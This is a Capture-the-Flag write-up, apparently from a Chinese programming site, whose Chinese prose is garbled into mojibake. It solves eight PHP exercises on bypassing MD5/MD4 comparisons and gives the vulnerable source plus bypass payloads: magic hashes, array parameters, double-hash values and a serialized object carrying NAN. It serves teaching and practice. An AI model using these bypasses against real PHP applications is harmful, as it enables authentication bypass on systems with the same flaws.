ITÊýÂë ¹ºÎï ÍøÖ· Í·Ìõ Èí¼þ ÈÕÀú ÔĶÁ ͼÊé¹Ý
TxTС˵ÔĶÁÆ÷
¡ýÓïÒôÔĶÁ,С˵ÏÂÔØ,¹ÅµäÎÄѧ¡ý 		ͼƬÅúÁ¿ÏÂÔØÆ÷
¡ýÅúÁ¿ÏÂÔØͼƬ,ÃÀŮͼ¿â¡ý 		ͼƬ×Ô¶¯²¥·ÅÆ÷
¡ýͼƬ×Ô¶¯²¥·ÅÆ÷¡ý 		Ò»¼üÇå³ýÀ¬»ø
¡ýÇáÇáÒ»µã,Çå³ýϵͳÀ¬»ø¡ý
¿ª·¢: C++֪ʶ¿â Java֪ʶ¿â JavaScript Python PHP֪ʶ¿â È˹¤ÖÇÄÜ Çø¿éÁ´ ´óÊý¾Ý Òƶ¯¿ª·¢ ǶÈëʽ ¿ª·¢¹¤¾ß Êý¾Ý½á¹¹ÓëËã·¨ ¿ª·¢²âÊÔ ÓÎÏ·¿ª·¢ ÍøÂçЭÒé ϵͳÔËά
½Ì³Ì: HTML½Ì³Ì CSS½Ì³Ì JavaScript½Ì³Ì GoÓïÑÔ½Ì³Ì JQuery½Ì³Ì VUE½Ì³Ì VUE3½Ì³Ì Bootstrap½Ì³Ì SQLÊý¾Ý¿â½Ì³Ì CÓïÑÔ½Ì³Ì C++½Ì³Ì Java½Ì³Ì Python½Ì³Ì Python3½Ì³Ì C#½Ì³Ì
ÊýÂë: µçÄÔ ±Ê¼Ç±¾ ÏÔ¿¨ ÏÔʾÆ÷ ¹Ì̬ӲÅÌ Ó²ÅÌ ¶ú»ú ÊÖ»ú iphone vivo oppo СÃ× »ªÎª µ¥·´ ×°»ú ͼÀ­¶¡
 
   -> PHP֪ʶ¿â -> [CTF] ¹ØÓÚphp´úÂëÉó¼ÆµÄMD5ÀàµÄÁ·Ï° -> ÕýÎÄÔĶÁ

[PHP֪ʶ¿â][CTF] ¹ØÓÚphp´úÂëÉó¼ÆµÄMD5ÀàµÄÁ·Ï°

Á·Ï°1

PHP´úÂë:

 <?php
    error_reporting(0);
    highlight_file("pass-01.php");

    if(isset($_GET["pass"])){
        if($_GET["pass"] != hash("md4", $_GET["pass"])){
            die('fail~~~');
        }else{
            echo "success!!!<br>";
            echo file_get_contents('flag.txt')."\n";
            echo "<a href='pass-02.php'>ÏÂÒ»¹Ø</a>";
        }
    }else{
        echo "please input the pass";
    }
?> please input the pass

º¯Êý½âÎö:

isset()   // ¼ì²â±äÁ¿ÊÇ·ñÒÑÉùÃ÷ÇÒÖµ²»ÎªNULL

´úÂëÉó¼Æ:

pass´«ÈëµÄÖµºÍ¾­¹ýmd4¼ÓÃܵÄÖµÏàµÈµÃµ½flag

½âÌâ:

MD4ÅöײµÃ:0e251288019

¡à pass=0e251288019

Á·Ï°2

PHP´úÂë:

 <?php
    error_reporting(0);
    highlight_file("pass-02.php");

    if(isset($_GET['user']) && isset($_GET['pass'])){
        $user = $_GET['user'];
        $pass = $_GET['pass'];

        if($user != $pass && md5($user) == md5($pass)){
            echo "success!<br>";
            echo file_get_contents('flag.txt')."\n";
            echo "<a href='pass-03.php'>?????€?¡­3</a>";
        }else{
            echo "fail~~~";
        }

    }else{
        echo "please input the user and pass!"."\n";
    }
?> please input the user and pass!

´úÂëÉó¼Æ:

ͨ¹ýget·½Ê½»ñµÃµÄuserºÍpassÖµ²»ÏàµÈÇÒÁ½Õß¾­¹ýMD5¼ÓÃܺóµÄÖµÏàµÈ

½âÌâ:

´«ÈëÊý×é,ĬÈÏMD5(Êý×é)·µ»ØNULL

ÓÃÊý×éÈƹýµÃ:
http://¡­¡­/?user[]=1&pass[]=2

Á·Ï°3

PHP´úÂë:

 <?php
    error_reporting(0);
    highlight_file("pass-03.php");

    if(isset($_GET['user']) && isset($_GET['pass'])){
        $user = $_GET['user'];
        $pass = $_GET['pass'];

        if(!ctype_alpha($user) && !is_numeric($pass) && md5($user) == md5($pass)){
            echo "success!<br>";
            echo file_get_contents('flag.txt')."\n";
            echo "<a href='pass-04.php'>?????€?¡­3</a>";
        }else{
            echo "fail~~~";
        }

    }else{
        echo "please input the user and pass!"."\n";
    }
?> please input the user and pass!

º¯Êý½âÎö:

ctype_alpha()   // ÓÃÓÚ¼ì²âËù¸ø²ÎÊýÊDz»ÊÇ×Öĸ
is_numeric()   // ÓÃÓÚ¼ì²â±äÁ¿ÊÇ·ñΪÊý×Ö»ò×Ö·û´®

´úÂëÉó¼Æ:

º¯ÊýÇ°¼Ó¡° !¡±±íʾ·µ»Øfalse
user²»ÊÇ×ÖĸÇÒpass²»ÊÇÊý×ÖºÍÊý×Ö×Ö·û´®
ÇÒ¶þÕßMD5¼ÓÃܺóÖµÏàµÈ

ͬÑùÓÃÊý×éÈƹýµÃ
http://¡­¡­/?user[]=0&pass[]=a

Á·Ï°4

PHP´úÂë:

 <?php
    error_reporting(0);
    highlight_file("pass-04.php");

    if(isset($_GET['user']) && isset($_GET['pass'])){
        $user = $_GET['user'];
        $pass = $_GET['pass'];

        if($user != $pass && md5($user) == md5(md5($pass))){
            echo "success!<br>";
            echo file_get_contents('flag.txt')."\n";
            echo "<a href='pass-05.php'>?????€?¡­3</a>";
        }else{
            echo "fail~~~";
        }

    }else{
        echo "please input the user and pass!"."\n";
    }
?> please input the user and pass!

´úÂëÉó¼Æ:
¸ÃÌâʹÓÃÁËMD5¶þ´Î¼ÓÃÜ,Ìõ¼þûÓÐÌ«¶àµÄÏÞÖÆ,Ö÷ÒªÒª½â¾öµÄÊÇ

md5($user) == md5(md5($pass))

»¯¼òµÃ:

$user == md5($pass)

¿ÉÒÔдһ´®php´úÂë:

<?php
    echo md5(1);
    echo "<br>";
    echo md5(md5(1));
?>

½á¹ûÊÇ:

c4ca4238a0b923820dcc509a6f75849b
28c8edde3d61a0411511d3b1866f0636

×îºó´ð°¸Îª:

http://¡­¡­/?user=c4ca4238a0b923820dcc509a6f75849b&pass=1

×¢Òâ:¹Û²ìÏÂÃæÁ½¸öµØÖ·

http://192.168.1.1/pass-04/?user=c4ca4238a0b923820dcc509a6f75849b&pass=1
http://192.168.1.1/pass-04/?user=c4ca4238a0b923820dcc509a6f75849b &pass=1

ÕâÁ½¸öµØÖ·´«ÈëµÄuserÖµÊDz»Ò»ÑùµÄ,µÚ¶þ¸öµØÖ·ÔÚ¡°&pass=1¡±Ç°¶àÁ˸ö¿Õ¸ñ,Õâ»áµ¼ÖÂuser»á¶à´«Ò»¸ö¿Õ¸ñ½øÈ¥,¾ÍºÍmd5(md5(1))µÄµÄÖµ²»Ò»ÑùÁË

Á·Ï°5

PHP´úÂë:

 <?php
    error_reporting(0);
    highlight_file("pass-05.php");

    if(isset($_GET['user']) && isset($_GET['pass'])){
        $user = $_GET['user'];
        $pass = $_GET['pass'];

        if($user != $pass && md5($user) === md5(md5($pass))){
            echo "success!<br>";
            echo file_get_contents('flag.txt')."\n";
            echo "<a href='pass-06.php'>?????€?¡­3</a>";
        }else{
            echo "fail~~~";
        }

    }else{
        echo "please input the user and pass!"."\n";
    }
?> please input the user and pass!

´úÂëÉó¼Æ:
Ö÷ÒªÄѵãÊÇ:

md5($user) === md5(md5($pass))

ÓëµÚ4ÌâÏàËÆ,À´¿´Ò»Ï¼¸¸öµÈÓںŵÄÇø±ð

===±È½ÏÁ½¸ö±äÁ¿µÄÖµºÍÀàÐÍ
==±È½ÏÁ½¸ö±äÁ¿µÄÖµ,²»±È½ÏÊý¾ÝÀàÐÍ

×îºó´ð°¸Îª:

http://¡­¡­/?user=c4ca4238a0b923820dcc509a6f75849b&pass=1

Á·Ï°6

PHP´úÂë:

 <?php
    error_reporting(0);
    highlight_file("pass-06.php");

    if(isset($_GET['user']) && isset($_GET['pass'])){
        $user = (string)$_GET['user'];
        $pass = (string)$_GET['pass'];

        if($user != $pass && md5($user) == md5(md5($pass))){
            echo "success!<br>";
            echo file_get_contents('flag.txt')."\n";
            echo "<a href='pass-07.php'>?????€?¡­3</a>";
        }else{
            echo "fail~~~";
        }

    }else{
        echo "please input the user and pass!"."\n";
    }
?> please input the user and pass!

²»×ö¹ý¶à½âÊÍ
×îºó´ð°¸Îª:

http://¡­¡­/?user=c4ca4238a0b923820dcc509a6f75849b&pass=1

Á·Ï°7

PHP´úÂë:

 <?php
    error_reporting(0);
    highlight_file("pass-07.php");

    if(isset($_GET['user']) && isset($_GET['pass'])){
        $user = $_GET['user'];
        $pass = $_GET['pass'];

        if($user !== $pass && md5($user) === md5($pass)){
            echo "success!<br>";
            echo file_get_contents('flag.txt')."\n";
            echo "<a href='pass-08.php'>?????€?¡­3</a>";
        }else{
            echo "fail~~~";
        }

    }else{
        echo "please input the user and pass!"."\n";
    }
?> please input the user and pass!

²»×ö¹ý¶à½âÊÍÖ±½ÓÊý×éÈƹý
×îºó´ð°¸Îª:

http://¡­¡­/?user[]=0&pass[]=1

Á·Ï°8

PHP´úÂë:

 <?php
    error_reporting(0);
    highlight_file("pass-08.php");

    class auth{
        public $user;
        public $pass;

        public function __destruct(){

            $this->user = (string)$this->user;
            if(strlen($this->user) > 3 || strlen($this->pass) >3){
                echo "level1 is fail~~~";
            }
            if($this->user !== $this->pass && $this->user != $this->pass && md5($this->user) === md5($this->pass)){
                echo "success!<br>";    
                echo file_get_contents("flag.txt");
            }else{
                echo "level2 is fail~~~";
            }
        }
    }
    unserialize($_POST['auth']);
?>

º¯Êý½âÎö:

__destruct()   // Îö¹¹º¯ÊýµÄ×÷Óú͹¹Ô캯ÊýÕýºÃÏà·´,Îö¹¹º¯ÊýÖ»ÓÐÔÚ¶ÔÏó±»À¬»øÊÕ¼¯Æ÷ÊÕ¼¯Ç°(¼´¶ÔÏó´ÓÄÚ´æÖÐɾ³ý֮ǰ)²Å»á±»×Ô¶¯µ÷Óá£Îö¹¹º¯ÊýÔÊÐíÎÒÃÇÔÚÏú»ÙÒ»¸ö¶ÔÏó֮ǰִÐÐһЩÌض¨µÄ²Ù×÷,ÀýÈç¹Ø±ÕÎļþ¡¢ÊͷŽá¹û¼¯µÈ¡£
strlen()   // ·µ»Ø×Ö·û´®³¤¶È
unserialize()   // º¯ÊýÓÃÓÚ½«Í¨¹ý serialize() º¯ÊýÐòÁл¯ºóµÄ¶ÔÏó»òÊý×é½øÐз´ÐòÁл¯,²¢·µ»ØԭʼµÄ¶ÔÏó½á¹¹

½âÌâ:
ÒòΪ×îºó½øÐÐÊÇPOSTÊäÈëºó½øÐз´ÐòÁл¯,ËùÒÔÎÒÃÇÒª¹¹ÔìÒ»¸öÓë±¾Ìâ´úÂëÏàËƵĽøÐÐÐòÁл¯

<?php

    class auth
    {
        public $user;
        public $pass;
    }

    $a = new auth();
    $a->user = NAN;
    $a->pass = NAN;
    echo serialize($a);

?>

Êä³ö½á¹ûΪ:

O:4:"auth":2:{s:4:"user";d:NAN;s:4:"pass";d:NAN;}

POSTÌá½»·½Ê½Ìá½»×îºó´ð°¸Îª:

auth=O:4:"auth":2:{s:4:"user";d:NAN;s:4:"pass";d:NAN;}

֪ʶµã:
1¡¢¹ØÓÚNANºÍINF

NAN ´ú±í·ÇºÏ·¨ÊýÖµ
INF ´ú±íÎÞÇî´ó

2¡¢NAN

NAN === (string)NAN   // Ϊ¼Ù
  PHP֪ʶ¿â ×îÐÂÎÄÕÂ
Laravel ÏÂʵÏÖ Google 2fa ÑéÖ¤
UUCTF WP
DASCTF10ÔÂ web
XAMPPÈÎÒâÃüÁîÖ´ÐÐÌáÉýȨÏÞ©¶´£¨CVE-2020-
[GYCTF2020]Easyphp
iwebsec°Ð³¡ ´úÂëÖ´Ðйؿ¨Í¨¹Ø±Ê¼Ç
¶à¸öÏß³Ìͬ²½Ö´ÐУ¬¶à¸öÏß³ÌÒÀ´ÎÖ´ÐУ¬¶à¸ö
php ûʼǼϳ£Ó÷½·¨ (TP5.1)
phpÖ®jwt
2021-09-18
ÉÏһƪÎÄÕ      ÏÂһƪÎÄÕ      ²é¿´ËùÓÐÎÄÕÂ
¼Ó:2021-12-06 15:03:32  ¸ü:2021-12-06 15:03:55 
 
¿ª·¢: C++֪ʶ¿â Java֪ʶ¿â JavaScript Python PHP֪ʶ¿â È˹¤ÖÇÄÜ Çø¿éÁ´ ´óÊý¾Ý Òƶ¯¿ª·¢ ǶÈëʽ ¿ª·¢¹¤¾ß Êý¾Ý½á¹¹ÓëËã·¨ ¿ª·¢²âÊÔ ÓÎÏ·¿ª·¢ ÍøÂçЭÒé ϵͳÔËά
½Ì³Ì: HTML½Ì³Ì CSS½Ì³Ì JavaScript½Ì³Ì GoÓïÑÔ½Ì³Ì JQuery½Ì³Ì VUE½Ì³Ì VUE3½Ì³Ì Bootstrap½Ì³Ì SQLÊý¾Ý¿â½Ì³Ì CÓïÑÔ½Ì³Ì C++½Ì³Ì Java½Ì³Ì Python½Ì³Ì Python3½Ì³Ì C#½Ì³Ì
ÊýÂë: µçÄÔ ±Ê¼Ç±¾ ÏÔ¿¨ ÏÔʾÆ÷ ¹Ì̬ӲÅÌ Ó²ÅÌ ¶ú»ú ÊÖ»ú iphone vivo oppo СÃ× »ªÎª µ¥·´ ×°»ú ͼÀ­¶¡

360ͼÊé¹Ý ¹ºÎï Èý·á¿Æ¼¼ ÔĶÁÍø ÈÕÀú ÍòÄêÀú 2024Äê11ÈÕÀú -2024/11/14 14:35:36-

ͼƬ×Ô¶¯²¥·ÅÆ÷
¡ýͼƬ×Ô¶¯²¥·ÅÆ÷¡ý 		TxTС˵ÔĶÁÆ÷
¡ýÓïÒôÔĶÁ,С˵ÏÂÔØ,¹ÅµäÎÄѧ¡ý 		Ò»¼üÇå³ýÀ¬»ø
¡ýÇáÇáÒ»µã,Çå³ýϵͳÀ¬»ø¡ý 		ͼƬÅúÁ¿ÏÂÔØÆ÷
¡ýÅúÁ¿ÏÂÔØͼƬ,ÃÀŮͼ¿â¡ý
  ÍøÕ¾ÁªÏµ: qq:121756557 email:121756557@qq.com  ITÊýÂë